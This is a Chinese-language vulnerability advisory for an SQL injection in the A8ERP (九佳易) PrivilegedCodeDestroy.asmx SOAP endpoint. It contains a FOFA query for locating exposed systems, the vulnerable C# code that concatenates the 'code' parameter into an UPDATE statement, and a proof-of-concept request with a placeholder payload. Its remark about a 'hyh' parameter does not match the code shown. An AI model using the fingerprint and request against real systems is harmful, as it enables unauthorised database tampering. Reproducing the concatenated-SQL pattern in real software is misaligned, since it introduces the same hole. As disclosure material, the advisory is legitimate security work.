漏洞简介
九佳易系统管理系统中的 PrivilegedCodeDestroy.asmx 通用处理程序接口存在SQL注入漏洞,该接口主要用于处理前端 AJAX 请求并与后端数据库进行交互。由于接口未对客户端传入的关键参数进行严格的输入校验、参数化处理或特殊字符转义,攻击者可通过构造恶意的 SQL 语句片段注入到请求参数中,使后端数据库执行非授权的 SQL 操作,进而窃取、篡改甚至销毁数据库中的敏感数据。
影响版本
fofa语法
title="VSQL" && body="/Scripts/Login_A8/"
漏洞分析
根据 Interface/licx/PrivilegedCodeDestroy.asmx 的代码引用
<%@ WebService Language="C#" CodeBehind="PrivilegedCodeDestroy.asmx.cs" Class="A8ERP.Interface.licx.PrivilegedCodeDestroy" %>
找到 A8ERP.Interface.licx.PrivilegedCodeDestroy 相关类的实现逻辑
using System;
using System.ComponentModel;
using System.Data.Common;
using System.Web.Services;
#nullable disable
namespace A8ERP.Interface.licx;
[WebService(Namespace = "http://tempuri.org/")]
[ToolboxItem(false)]
[WebServiceBinding]
public class PrivilegedCodeDestroy : WebService
{
[WebMethod]
public string UpdatePrivilegedState(string code)
{
DBHelp dbHelp = new DBHelp();
dbHelp.Open();
try
{
string sql = $"UPDATE privileged_state SET zt='1' WHERE code='{code}'";
((DbCommand) dbHelp.GetCommand(sql)).ExecuteNonQuery();
}
catch (Exception ex)
{
}
finally
{
dbHelp.Close();
}
return "";
}
}
非常明显拼接导致的SQL注入,参数code无任何过滤或校验被直接拼接到$"UPDATE privileged_state SET zt='1' WHERE code='{code}'";sql语句中,然后调用dbHelp.GetCommand(sql)).ExecuteNonQuery()方法进行执行,从而造成SQL注入漏洞。
漏洞复现
因为参数获取是通过
this.Request["hyh"]的方式,因此支持get、post等常规方式外,还支持multipart格式
POST /Interface/licx/PrivilegedCodeDestroy.asmx HTTP/1.1
SOAPAction: http://tempuri.org/UpdatePrivilegedState
Content-Type: text/xml;charset=UTF-8
Host: a8erp.mrxn.net
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
<soap:Header/>
<soap:Body>
<tem:UpdatePrivilegedState>
<!--type: string-->
<tem:code>SQLI_POC</tem:code>
</tem:UpdatePrivilegedState>
</soap:Body>
</soap:Envelope>

成功延时 5 秒


